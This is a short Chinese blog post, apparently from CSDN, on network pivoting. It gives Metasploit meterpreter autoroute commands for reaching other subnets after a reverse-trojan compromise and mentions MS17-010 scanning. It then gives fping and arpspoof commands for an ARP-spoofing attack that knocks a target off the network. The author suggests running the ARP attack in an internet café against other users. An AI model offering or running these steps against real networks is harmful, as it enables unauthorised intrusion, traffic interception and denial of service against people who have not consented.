msf 代理内网机器后,进行内网其他网段机器的渗透

##titile :msf 代理内网机器后,进行内网其他网段机器的渗透

首先利用反弹木马返回meterpreter shell

利用这个shell 查该机器网段,及添加路由,为渗透其他的机器做准备

  • run get_local_subnets //获取路由地址
  • run autoroute -s xxx.xxx.xxx.xxx/24 //添加路由
  • run autoroute -p //查看添加的路由
    +run autorouute -d //删除添加的路由
  • background //挂载到后台运行

至此,我们成功的把路由网段给添加到msf中。backgroup让会话在后台运行,我们可以用ms17-010来扫描整个内网机子了。

在linux环境

ARP攻击的攻击原理

  • ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。

操作指令:

· fping -asg 网络号/子网掩码 # 查看内网在线主机

· arpspoof -i eth0 -t 目标IP 网关IP # ARP欺骗

  • 1.取得 win 7 上的 ip 地址 和网关地址

如:

· ip地址: 192.168.135.131

· 网关地址: 192.168.135.2

查看同一局域网内当前在线的主机情况:

fping -asg 192.168.135.0/24

在查找到网内在线的主机后,就可以选择一个作为攻击的目标了,这里以 win7 为受害主机,攻击如下:

arpspoof -i eth0 -t 192.168.135.131(攻击机ip) 192.168.135.2(网关)
这样可以让目标机器无法联网通信。

但实际情况,如果我需要在网吧使用我远程服务器进行arp攻击的话,还需要进行本地的代理,让本地代理我的远程服务器这样使我的服务器处于同个网段。不然就只能带个u盘了

  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值